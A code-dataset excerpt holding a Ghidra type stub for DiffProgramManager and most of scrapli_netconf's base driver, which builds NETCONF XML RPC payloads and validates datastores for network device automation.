a9dbd0cdcd940053789e278ea1754c00d7bcc81d | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/plugin/core/diff/DiffProgramManager.pyi | a0a10fe1025a5187fd858ff298fe56649ee228e8 | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,233 | pyi | from typing import List
import ghidra.app.services
import ghidra.framework.model
import ghidra.program.model.address
import ghidra.program.model.listing
import java.awt
import java.lang
import java.net
# Type stub (.pyi-style) describing the Java-backed DiffProgramManager used by
# Ghidra's program-diff plugin; bodies are intentionally `...` placeholders.
class DiffProgramManager(object, ghidra.app.services.ProgramManager):
    OPEN_CURRENT: int = 1
    OPEN_HIDDEN: int = 0
    OPEN_VISIBLE: int = 2
    def __init__(self, __a0: ghidra.app.plugin.core.diff.ProgramDiffPlugin): ...
    def closeAllPrograms(self, __a0: bool) -> bool: ...
    def closeOtherPrograms(self, __a0: bool) -> bool: ...
    @overload
    def closeProgram(self) -> bool: ...
    @overload
    def closeProgram(self, __a0: ghidra.program.model.listing.Program, __a1: bool) -> bool: ...
    def equals(self, __a0: object) -> bool: ...
    def getAllOpenPrograms(self) -> List[ghidra.program.model.listing.Program]: ...
    def getClass(self) -> java.lang.Class: ...
    def getCurrentProgram(self) -> ghidra.program.model.listing.Program: ...
    def getProgram(self, __a0: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Program: ...
    def hashCode(self) -> int: ...
    def isLocked(self) -> bool: ...
    def isVisible(self, __a0: ghidra.program.model.listing.Program) -> bool: ...
    def lockDown(self, __a0: bool) -> None: ...
    def notify(self) -> None: ...
    def notifyAll(self) -> None: ...
    @overload
    def openProgram(self, __a0: ghidra.framework.model.DomainFile) -> ghidra.program.model.listing.Program: ...
    @overload
    def openProgram(self, __a0: ghidra.program.model.listing.Program) -> None: ...
    @overload
    def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: int) -> ghidra.program.model.listing.Program: ...
    @overload
    def openProgram(self, __a0: ghidra.program.model.listing.Program, __a1: int) -> None: ...
    @overload
    def openProgram(self, __a0: java.net.URL, __a1: int) -> ghidra.program.model.listing.Program: ...
    @overload
    def openProgram(self, __a0: ghidra.program.model.listing.Program, __a1: bool) -> None: ...
    @overload
    def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: java.awt.Component) -> ghidra.program.model.listing.Program: ...
    @overload
    def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: int, __a2: int) -> ghidra.program.model.listing.Program: ...
    def releaseProgram(self, __a0: ghidra.program.model.listing.Program, __a1: object) -> None: ...
    def setCurrentProgram(self, __a0: ghidra.program.model.listing.Program) -> None: ...
    def setPersistentOwner(self, __a0: ghidra.program.model.listing.Program, __a1: object) -> bool: ...
    def toString(self) -> unicode: ...
    @overload
    def wait(self) -> None: ...
    @overload
    def wait(self, __a0: long) -> None: ...
    @overload
    def wait(self, __a0: long, __a1: int) -> None: ...
    @property
    def allOpenPrograms(self) -> List[ghidra.program.model.listing.Program]: ...
    @property
    def currentProgram(self) -> ghidra.program.model.listing.Program: ...
    @currentProgram.setter
    def currentProgram(self, value: ghidra.program.model.listing.Program) -> None: ...
    @property
    def locked(self) -> bool: ...
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
f2f3266efd903079ca767cb4f1fa1d9cf64c745e | b370b955afa231e7f6c79fe4c95af687661ebc24 | /.venv/lib/python3.9/site-packages/scrapli_netconf/driver/base_driver.py | a94d437f3d15e2fa0b9379a21f15a2dad07f05e5 | [] | no_license | HWNET12/Nornir | e9e152cc2d477feb38a99afce08b8c36b3f4b1b6 | 26ca756664c209b9205816c35bddf2216a0182e0 | refs/heads/main | 2023-08-13T15:10:28.496854 | 2021-10-06T16:26:43 | 2021-10-06T16:26:43 | 414,286,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,432 | py | # pylint: disable=C0302
"""scrapli_netconf.driver.base_driver"""
import importlib
from dataclasses import fields
from enum import Enum
from typing import Any, Callable, List, Optional, Tuple, Union
from lxml import etree
from lxml.etree import _Element
from scrapli.driver.base.base_driver import BaseDriver
from scrapli.exceptions import ScrapliTypeError, ScrapliValueError
from scrapli.helper import user_warning
from scrapli_netconf.channel.base_channel import NetconfBaseChannelArgs
from scrapli_netconf.constants import NetconfClientCapabilities, NetconfVersion, XmlParserVersion
from scrapli_netconf.exceptions import CapabilityNotSupported
from scrapli_netconf.response import NetconfResponse
COMPRESSED_PARSER = etree.XMLParser(remove_blank_text=True, recover=True)
STANDARD_PARSER = etree.XMLParser(remove_blank_text=False, recover=True)
class NetconfBaseOperations(Enum):
    """XML payload templates for the base netconf rpc operations.

    Each value is a format string; placeholders such as {source}, {target},
    {filter_type}, {xpath}, {default_type} and {message_id} are filled in by
    the corresponding builder methods on NetconfBaseDriver.
    """

    FILTER_SUBTREE = "<filter type='{filter_type}'></filter>"
    FILTER_XPATH = "<filter type='{filter_type}' select='{xpath}'></filter>"
    WITH_DEFAULTS_SUBTREE = (
        "<with-defaults xmlns='urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults'>"
        "{default_type}</with-defaults>"
    )
    GET = "<get></get>"
    GET_CONFIG = "<get-config><source><{source}/></source></get-config>"
    EDIT_CONFIG = "<edit-config><target><{target}/></target></edit-config>"
    DELETE_CONFIG = "<delete-config><target><{target}/></target></delete-config>"
    COPY_CONFIG = (
        "<copy-config><target><{target}/></target><source><{source}/></source></copy-config>"
    )
    COMMIT = "<commit/>"
    DISCARD = "<discard-changes/>"
    LOCK = "<lock><target><{target}/></target></lock>"
    UNLOCK = "<unlock><target><{target}/></target></unlock>"
    RPC = "<rpc xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' message-id='{message_id}'></rpc>"
    VALIDATE = "<validate><source><{source}/></source></validate>"
class NetconfBaseDriver(BaseDriver):
    """Shared base functionality for scrapli netconf drivers."""

    host: str
    # datastores the server allows reading/writing; populated from the server's
    # advertised capabilities by _build_readable/_build_writeable_datastores
    readable_datastores: List[str]
    writeable_datastores: List[str]
    # if True, namespaces are stripped from responses (passed to NetconfResponse)
    strip_namespaces: bool
    # if True, invalid datastore source/target raises instead of warning
    strict_datastores: bool
    flatten_input: bool
    _netconf_base_channel_args: NetconfBaseChannelArgs
@property
def netconf_version(self) -> NetconfVersion:
    """
    Netconf version negotiated/used for this connection.

    Returns:
        NetconfVersion: netconf_version enum

    """
    return self._netconf_base_channel_args.netconf_version
@netconf_version.setter
def netconf_version(self, value: NetconfVersion) -> None:
    """
    Set the netconf version; also updates the channel prompt pattern to match.

    Args:
        value: NetconfVersion to use

    Raises:
        ScrapliTypeError: if value is not of type NetconfVersion

    """
    if not isinstance(value, NetconfVersion):
        raise ScrapliTypeError
    self.logger.debug(f"setting 'netconf_version' value to '{value.value}'")
    self._netconf_base_channel_args.netconf_version = value
    # netconf 1.0 frames end with ]]>]]>; 1.1 chunked framing ends with ##
    if value == NetconfVersion.VERSION_1_0:
        prompt_pattern = "]]>]]>"
    else:
        prompt_pattern = r"^##$"
    self._base_channel_args.comms_prompt_pattern = prompt_pattern
@property
def client_capabilities(self) -> NetconfClientCapabilities:
    """
    Netconf capabilities advertised by this client.

    Returns:
        NetconfClientCapabilities: netconf client capabilities enum

    """
    return self._netconf_base_channel_args.client_capabilities
@client_capabilities.setter
def client_capabilities(self, value: NetconfClientCapabilities) -> None:
    """
    Set the client capabilities to advertise to the server.

    Args:
        value: NetconfClientCapabilities value for client_capabilities

    Raises:
        ScrapliTypeError: if value is not of type NetconfClientCapabilities

    """
    if not isinstance(value, NetconfClientCapabilities):
        raise ScrapliTypeError
    self.logger.debug(f"setting 'client_capabilities' value to '{value.value}'")
    self._netconf_base_channel_args.client_capabilities = value
@property
def server_capabilities(self) -> List[str]:
    """
    Capabilities advertised by the netconf server (empty list if none yet).

    Returns:
        list: list of strings of server capabilities

    """
    current = self._netconf_base_channel_args.server_capabilities
    return current or []
@server_capabilities.setter
def server_capabilities(self, value: List[str]) -> None:
    """
    Setter for 'server_capabilities' attribute

    Note: annotation corrected from NetconfClientCapabilities to List[str] --
    the runtime isinstance check (and the getter's return type) both treat
    this value as a list of capability strings.

    Args:
        value: list of strings of netconf server capabilities

    Returns:
        None

    Raises:
        ScrapliTypeError: if value is not of type list

    """
    if not isinstance(value, list):
        raise ScrapliTypeError
    self.logger.debug(f"setting 'server_capabilities' value to '{value}'")
    self._netconf_base_channel_args.server_capabilities = value
@staticmethod
def _determine_preferred_netconf_version(
    preferred_netconf_version: Optional[str],
) -> NetconfVersion:
    """
    Determine users preferred netconf version (if applicable)

    Args:
        preferred_netconf_version: optional string indicating users preferred netconf version

    Returns:
        NetconfVersion: users preferred netconf version

    Raises:
        ScrapliValueError: if preferred_netconf_version is not None or a valid option

    """
    version_map = {
        None: NetconfVersion.UNKNOWN,
        "1.0": NetconfVersion.VERSION_1_0,
        "1.1": NetconfVersion.VERSION_1_1,
    }
    if preferred_netconf_version in version_map:
        return version_map[preferred_netconf_version]
    raise ScrapliValueError(
        "'preferred_netconf_version' provided with invalid value, must be one of: "
        "None, '1.0', or '1.1'"
    )
@staticmethod
def _determine_preferred_xml_parser(use_compressed_parser: bool) -> XmlParserVersion:
    """
    Map the use_compressed_parser flag onto an XmlParserVersion enum.

    Args:
        use_compressed_parser: bool indicating use of compressed parser or not

    Returns:
        XmlParserVersion: users xml parser version

    Raises:
        N/A

    """
    return (
        XmlParserVersion.COMPRESSED_PARSER
        if use_compressed_parser is True
        else XmlParserVersion.STANDARD_PARSER
    )
@property
def xml_parser(self) -> etree.XMLParser:
    """
    lxml parser used for parsing xml documents (module-level singletons).

    Returns:
        etree.XMLParser: parser to use for parsing xml documents

    """
    use_compressed = (
        self._netconf_base_channel_args.xml_parser == XmlParserVersion.COMPRESSED_PARSER
    )
    return COMPRESSED_PARSER if use_compressed else STANDARD_PARSER
@xml_parser.setter
def xml_parser(self, value: XmlParserVersion) -> None:
    """
    Set the xml parser version to use.

    Args:
        value: enum indicating parser version to use

    Raises:
        ScrapliTypeError: if value is not of type XmlParserVersion

    """
    if not isinstance(value, XmlParserVersion):
        raise ScrapliTypeError
    self._netconf_base_channel_args.xml_parser = value
def _transport_factory(self) -> Tuple[Callable[..., Any], object]:
    """
    Determine proper transport class and necessary arguments to initialize that class

    Dynamically imports the netconf transport plugin module named after
    self.transport_name and collects the plugin's declared arguments from
    matching attributes on this driver instance.

    Returns:
        Tuple[Callable[..., Any], object]: tuple of transport class and dataclass of transport
            class specific arguments

    Raises:
        N/A

    """
    plugin_module = importlib.import_module(
        f"scrapli_netconf.transport.plugins.{self.transport_name}.transport"
    )
    transport_class = getattr(
        plugin_module, f"Netconf{self.transport_name.capitalize()}Transport"
    )
    args_class = getattr(plugin_module, "PluginTransportArgs")
    # pull each dataclass field's value off of this driver instance by name
    collected_args = {
        field.name: getattr(self, field.name) for field in fields(args_class)
    }
    return transport_class, args_class(**collected_args)
def _build_readable_datastores(self) -> None:
"""
Build a list of readable datastores based on server's advertised capabilities
Args:
N/A
Returns:
None
Raises:
N/A
"""
self.readable_datastores = []
self.readable_datastores.append("running")
if "urn:ietf:params:netconf:capability:candidate:1.0" in self.server_capabilities:
self.readable_datastores.append("candidate")
if "urn:ietf:params:netconf:capability:startup:1.0" in self.server_capabilities:
self.readable_datastores.append("startup")
def _build_writeable_datastores(self) -> None:
"""
Build a list of writeable/editable datastores based on server's advertised capabilities
Args:
N/A
Returns:
None
Raises:
N/A
"""
self.writeable_datastores = []
if "urn:ietf:params:netconf:capability:writeable-running:1.0" in self.server_capabilities:
self.writeable_datastores.append("running")
if "urn:ietf:params:netconf:capability:writable-running:1.0" in self.server_capabilities:
# NOTE: iosxe shows "writable" (as of 2020.07.01) despite RFC being "writeable"
self.writeable_datastores.append("running")
if "urn:ietf:params:netconf:capability:candidate:1.0" in self.server_capabilities:
self.writeable_datastores.append("candidate")
if "urn:ietf:params:netconf:capability:startup:1.0" in self.server_capabilities:
self.writeable_datastores.append("startup")
def _validate_get_config_target(self, source: str) -> None:
"""
Validate get-config source is acceptable
Args:
source: configuration source to get; typically one of running|startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid source was selected and strict_datastores is True
"""
if source not in self.readable_datastores:
msg = f"'source' should be one of {self.readable_datastores}, got '{source}'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore source!", message=msg)
def _validate_edit_config_target(self, target: str) -> None:
"""
Validate edit-config/lock/unlock target is acceptable
Args:
target: configuration source to edit/lock; typically one of running|startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid source was selected
"""
if target not in self.writeable_datastores:
msg = f"'target' should be one of {self.writeable_datastores}, got '{target}'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore target!", message=msg)
def _validate_delete_config_target(self, target: str) -> None:
"""
Validate delete-config/lock/unlock target is acceptable
Args:
target: configuration source to delete; typically one of startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid target was selected
"""
if target == "running" or target not in self.writeable_datastores:
msg = f"'target' should be one of {self.writeable_datastores}, got '{target}'"
if target == "running":
msg = "delete-config 'target' may not be 'running'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore target!", message=msg)
def _build_base_elem(self) -> _Element:
    """
    Create base <rpc> element for netconf operations

    Builds an rpc element carrying the current message-id, then increments the
    message-id counter for the next operation.

    Returns:
        _Element: lxml base element to use for netconf operation

    Raises:
        N/A

    """
    # message_id is an instance attribute; annotated here (pylint preferred it
    # not be a class attribute, per the original note)
    self.message_id: int  # pylint: disable=W0201
    self.logger.debug(f"Building base element for message id {self.message_id}")
    rpc_xml = NetconfBaseOperations.RPC.value.format(message_id=self.message_id)
    self.message_id += 1
    return etree.fromstring(text=rpc_xml)
def _build_filter(self, filter_: str, filter_type: str = "subtree") -> _Element:
    """
    Create filter element for a given rpc

    The `filter_` string may contain multiple xml elements at its "root" (subtree filters); we
    will simply place the payload into a temporary "tmp" outer tag so that when we cast it to an
    etree object the elements are all preserved; without this outer "tmp" tag, lxml will scoop
    up only the first element provided as it appears to be the root of the document presumably.

    An example valid (to scrapli netconf at least) xml filter would be:

    ```
    <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg">
        <interface-configuration>
            <active>act</active>
        </interface-configuration>
    </interface-configurations>
    <netconf-yang xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-man-netconf-cfg">
    </netconf-yang>
    ```

    Args:
        filter_: strings of filters to build into a filter element or (for subtree) a full
            filter string (in filter tags)
        filter_type: type of filter; subtree|xpath

    Returns:
        _Element: lxml filter element to use for netconf operation

    Raises:
        CapabilityNotSupported: if xpath selected and not supported on server
        ScrapliValueError: if filter_type is not one of subtree|xpath

    """
    if filter_type == "subtree":
        # tmp tags to place the user's not-quite-valid-xml filter into; see docstring
        _filter_ = f"<tmp>{filter_}</tmp>"
        # "validate" subtree filter by forcing it into xml, parser "flattens" it as well
        tmp_xml_filter_element = etree.fromstring(_filter_, parser=self.xml_parser)
        if tmp_xml_filter_element.getchildren()[0].tag == "filter":
            # the user filter was already wrapped in filter tags; blindly reuse the user's
            # filter but make sure the filter "type" attribute is set to subtree
            xml_filter_elem = tmp_xml_filter_element.getchildren()[0]
            xml_filter_elem.attrib["type"] = "subtree"
        else:
            # build a fresh <filter type='subtree'> wrapper element
            xml_filter_elem = etree.fromstring(
                NetconfBaseOperations.FILTER_SUBTREE.value.format(filter_type=filter_type),
            )
            # iterate through the children inside the tmp tags and insert *those* elements
            # into the actual final filter payload
            for xml_filter_element in tmp_xml_filter_element:
                # insert the subtree filter into the parent filter element
                xml_filter_elem.insert(1, xml_filter_element)
    elif filter_type == "xpath":
        # xpath filtering is an optional capability; refuse if server did not advertise it
        if "urn:ietf:params:netconf:capability:xpath:1.0" not in self.server_capabilities:
            msg = "xpath filter requested, but is not supported by the server"
            self.logger.exception(msg)
            raise CapabilityNotSupported(msg)
        xml_filter_elem = etree.fromstring(
            NetconfBaseOperations.FILTER_XPATH.value.format(
                filter_type=filter_type, xpath=filter_
            ),
            parser=self.xml_parser,
        )
    else:
        raise ScrapliValueError(
            f"'filter_type' should be one of subtree|xpath, got '{filter_type}'"
        )
    return xml_filter_elem
def _build_with_defaults(self, default_type: str = "report-all") -> _Element:
    """
    Create with-defaults element for a given operation

    Args:
        default_type: enumeration of with-defaults; report-all|trim|explicit|report-all-tagged

    Returns:
        _Element: lxml with-defaults element to use for netconf operation

    Raises:
        CapabilityNotSupported: if default_type provided but not supported by device
        ScrapliValueError: if default_type is not one of
            report-all|trim|explicit|report-all-tagged

    """
    # guard clauses first: reject unknown default types, then unsupported servers
    if default_type not in ("report-all", "trim", "explicit", "report-all-tagged"):
        raise ScrapliValueError(
            "'default_type' should be one of report-all|trim|explicit|report-all-tagged, "
            f"got '{default_type}'"
        )
    if (
        "urn:ietf:params:netconf:capability:with-defaults:1.0"
        not in self.server_capabilities
    ):
        msg = "with-defaults requested, but is not supported by the server"
        self.logger.exception(msg)
        raise CapabilityNotSupported(msg)
    return etree.fromstring(
        NetconfBaseOperations.WITH_DEFAULTS_SUBTREE.value.format(default_type=default_type),
        parser=self.xml_parser,
    )
def _finalize_channel_input(self, xml_request: _Element) -> bytes:
    """
    Create finalized channel input (as bytes)

    Args:
        xml_request: finalized xml element to cast to bytes and add declaration to

    Returns:
        bytes: finalized bytes input -- with 1.0 delimiter or 1.1 encoding

    Raises:
        N/A

    """
    raw_input: bytes = etree.tostring(
        element_or_tree=xml_request, xml_declaration=True, encoding="utf-8"
    )
    if self.netconf_version == NetconfVersion.VERSION_1_0:
        # netconf 1.0 end-of-message delimiter
        return raw_input + b"]]>]]>"
    # netconf 1.1 "chunked" framing: #<byte-count>\n<payload>\n##
    return b"#%b\n" % str(len(raw_input)).encode() + raw_input + b"\n##"
def _pre_get(self, filter_: str, filter_type: str = "subtree") -> NetconfResponse:
    """
    Handle pre "get" tasks for consistency between sync/async versions

    *NOTE*
    The channel input (filter_) is loaded up as an lxml etree element here, this is done with a
    parser that removes whitespace. This has a somewhat undesirable effect of making any
    "pretty" input not pretty, however... after we load the xml object (which we do to validate
    that it is valid xml) we dump that xml object back to a string to be used as the actual
    raw payload we send down the channel, which means we are sending "flattened" (not pretty/
    indented xml) to the device. This is important it seems! Some devices seme to not mind
    having the "nicely" formatted input (pretty xml). But! On devices that "echo" the inputs
    back -- sometimes the device will respond to our rpc without "finishing" echoing our inputs
    to the device, this breaks the core "read until input" processing that scrapli always does.
    For whatever reason if there are no line breaks this does not seem to happen? /shrug. Note
    that this comment applies to all of the "pre" methods that we parse a filter/payload!

    Args:
        filter_: string filter to apply to the get
        filter_type: type of filter; subtree|xpath

    Returns:
        NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
            channel inputs (string and xml)

    Raises:
        N/A

    """
    self.logger.debug(
        f"Building payload for 'get' operation. filter_type: {filter_type}, filter_: {filter_}"
    )
    # build base <rpc> request and insert the <get> element as its first child
    xml_request = self._build_base_elem()
    xml_get_element = etree.fromstring(NetconfBaseOperations.GET.value)
    xml_request.insert(0, xml_get_element)
    # build filter element
    xml_filter_elem = self._build_filter(filter_=filter_, filter_type=filter_type)
    # insert filter element into parent get element
    get_element = xml_request.find("get")
    get_element.insert(0, xml_filter_elem)
    channel_input = self._finalize_channel_input(xml_request=xml_request)
    response = NetconfResponse(
        host=self.host,
        channel_input=channel_input.decode(),
        xml_input=xml_request,
        netconf_version=self.netconf_version,
        strip_namespaces=self.strip_namespaces,
    )
    self.logger.debug(f"Built payload for 'get' operation. Payload: {channel_input.decode()}")
    return response
def _pre_get_config(
    self,
    source: str = "running",
    filter_: Optional[str] = None,
    filter_type: str = "subtree",
    default_type: Optional[str] = None,
) -> NetconfResponse:
    """
    Handle pre "get_config" tasks for consistency between sync/async versions

    See the *NOTE* on _pre_get regarding flattened xml input -- it applies
    here as well.

    Args:
        source: configuration source to get; typically one of running|startup|candidate
        filter_: string of filter(s) to apply to configuration
        filter_type: type of filter; subtree|xpath
        default_type: string of with-default mode to apply when retrieving configuration

    Returns:
        NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
            channel inputs (string and xml)

    Raises:
        N/A

    """
    self.logger.debug(
        f"Building payload for 'get-config' operation. source: {source}, filter_type: "
        f"{filter_type}, filter: {filter_}, default_type: {default_type}"
    )
    self._validate_get_config_target(source=source)
    # build base <rpc> request and insert the <get-config> element
    xml_request = self._build_base_elem()
    xml_get_config_element = etree.fromstring(
        NetconfBaseOperations.GET_CONFIG.value.format(source=source), parser=self.xml_parser
    )
    xml_request.insert(0, xml_get_config_element)
    if filter_ is not None:
        xml_filter_elem = self._build_filter(filter_=filter_, filter_type=filter_type)
        # insert filter element into parent get element
        get_element = xml_request.find("get-config")
        # insert *after* source, otherwise juniper seems to gripe, maybe/probably others as well
        get_element.insert(1, xml_filter_elem)
    if default_type is not None:
        # with-defaults goes after source (and filter, if any)
        xml_with_defaults_elem = self._build_with_defaults(default_type=default_type)
        get_element = xml_request.find("get-config")
        get_element.insert(2, xml_with_defaults_elem)
    channel_input = self._finalize_channel_input(xml_request=xml_request)
    response = NetconfResponse(
        host=self.host,
        channel_input=channel_input.decode(),
        xml_input=xml_request,
        netconf_version=self.netconf_version,
        strip_namespaces=self.strip_namespaces,
    )
    self.logger.debug(
        f"Built payload for 'get-config' operation. Payload: {channel_input.decode()}"
    )
    return response
def _pre_edit_config(self, config: str, target: str = "running") -> NetconfResponse:
"""
Handle pre "edit_config" tasks for consistency between sync/async versions
Args:
config: configuration to send to device
target: configuration source to target; running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(
f"Building payload for 'edit-config' operation. target: {target}, config: {config}"
)
self._validate_edit_config_target(target=target)
xml_config = etree.fromstring(config, parser=self.xml_parser)
# build base request and insert the edit-config element
xml_request = self._build_base_elem()
xml_edit_config_element = etree.fromstring(
NetconfBaseOperations.EDIT_CONFIG.value.format(target=target)
)
xml_request.insert(0, xml_edit_config_element)
# insert parent filter element to first position so that target stays first just for nice
# output/readability
edit_config_element = xml_request.find("edit-config")
edit_config_element.insert(1, xml_config)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'edit-config' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_delete_config(self, target: str = "running") -> NetconfResponse:
"""
Handle pre "edit_config" tasks for consistency between sync/async versions
Args:
target: configuration source to target; startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(f"Building payload for 'delete-config' operation. target: {target}")
self._validate_delete_config_target(target=target)
xml_request = self._build_base_elem()
xml_validate_element = etree.fromstring(
NetconfBaseOperations.DELETE_CONFIG.value.format(target=target), parser=self.xml_parser
)
xml_request.insert(0, xml_validate_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'delete-config' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_commit(self) -> NetconfResponse:
"""
Handle pre "commit" tasks for consistency between sync/async versions
Args:
N/A
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'commit' operation")
xml_request = self._build_base_elem()
xml_commit_element = etree.fromstring(
NetconfBaseOperations.COMMIT.value, parser=self.xml_parser
)
xml_request.insert(0, xml_commit_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'commit' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_discard(self) -> NetconfResponse:
"""
Handle pre "discard" tasks for consistency between sync/async versions
Args:
N/A
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'discard' operation.")
xml_request = self._build_base_elem()
xml_commit_element = etree.fromstring(
NetconfBaseOperations.DISCARD.value, parser=self.xml_parser
)
xml_request.insert(0, xml_commit_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'discard' operation. Payload: {channel_input.decode()}"
)
return response
    def _pre_lock(self, target: str) -> NetconfResponse:
        """
        Handle pre "lock" tasks for consistency between sync/async versions

        Args:
            target: configuration datastore to lock; running|startup|candidate

        Returns:
            NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
                channel inputs (string and xml)

        Raises:
            N/A

        """
        self.logger.debug("Building payload for 'lock' operation.")
        # lock accepts the same datastore names as edit-config, so that validator is reused
        self._validate_edit_config_target(target=target)
        xml_request = self._build_base_elem()
        xml_lock_element = etree.fromstring(
            NetconfBaseOperations.LOCK.value.format(target=target), parser=self.xml_parser
        )
        xml_request.insert(0, xml_lock_element)
        channel_input = self._finalize_channel_input(xml_request=xml_request)
        response = NetconfResponse(
            host=self.host,
            channel_input=channel_input.decode(),
            xml_input=xml_request,
            netconf_version=self.netconf_version,
            strip_namespaces=self.strip_namespaces,
        )
        self.logger.debug(f"Built payload for 'lock' operation. Payload: {channel_input.decode()}")
        return response
def _pre_unlock(self, target: str) -> NetconfResponse:
"""
Handle pre "unlock" tasks for consistency between sync/async versions
Args:
target: configuration source to target; running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'unlock' operation.")
self._validate_edit_config_target(target=target)
xml_request = self._build_base_elem()
xml_lock_element = etree.fromstring(
NetconfBaseOperations.UNLOCK.value.format(target=target, parser=self.xml_parser)
)
xml_request.insert(0, xml_lock_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'unlock' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_rpc(self, filter_: Union[str, _Element]) -> NetconfResponse:
"""
Handle pre "rpc" tasks for consistency between sync/async versions
Args:
filter_: filter/rpc to execute
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'rpc' operation.")
xml_request = self._build_base_elem()
# build filter element
if isinstance(filter_, str):
xml_filter_elem = etree.fromstring(filter_, parser=self.xml_parser)
else:
xml_filter_elem = filter_
# insert filter element
xml_request.insert(0, xml_filter_elem)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(f"Built payload for 'rpc' operation. Payload: {channel_input.decode()}")
return response
    def _pre_validate(self, source: str) -> NetconfResponse:
        """
        Handle pre "validate" tasks for consistency between sync/async versions

        Args:
            source: configuration source to validate; typically one of running|startup|candidate

        Returns:
            NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
                channel inputs (string and xml)

        Raises:
            CapabilityNotSupported: if 'validate' capability does not exist

        """
        self.logger.debug("Building payload for 'validate' operation.")
        # guard: refuse early (with a clear error) if the server did not advertise either
        # validate capability, rather than sending an rpc the server will reject
        if not any(
            cap in self.server_capabilities
            for cap in (
                "urn:ietf:params:netconf:capability:validate:1.0",
                "urn:ietf:params:netconf:capability:validate:1.1",
            )
        ):
            msg = "validate requested, but is not supported by the server"
            self.logger.exception(msg)
            raise CapabilityNotSupported(msg)
        # validate accepts the same datastore names as edit-config, so that validator is reused
        self._validate_edit_config_target(target=source)
        xml_request = self._build_base_elem()
        xml_validate_element = etree.fromstring(
            NetconfBaseOperations.VALIDATE.value.format(source=source), parser=self.xml_parser
        )
        xml_request.insert(0, xml_validate_element)
        channel_input = self._finalize_channel_input(xml_request=xml_request)
        response = NetconfResponse(
            host=self.host,
            channel_input=channel_input.decode(),
            xml_input=xml_request,
            netconf_version=self.netconf_version,
            strip_namespaces=self.strip_namespaces,
        )
        self.logger.debug(
            f"Built payload for 'validate' operation. Payload: {channel_input.decode()}"
        )
        return response
    def _pre_copy_config(self, source: str, target: str) -> NetconfResponse:
        """
        Handle pre "copy_config" tasks for consistency between sync/async versions

        Note that source is not validated/checked since it could be a url or a full configuration
        element itself.

        Args:
            source: configuration, url, or datastore to copy into the target datastore
            target: copy config destination/target; typically one of running|startup|candidate

        Returns:
            NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
                channel inputs (string and xml)

        Raises:
            N/A

        """
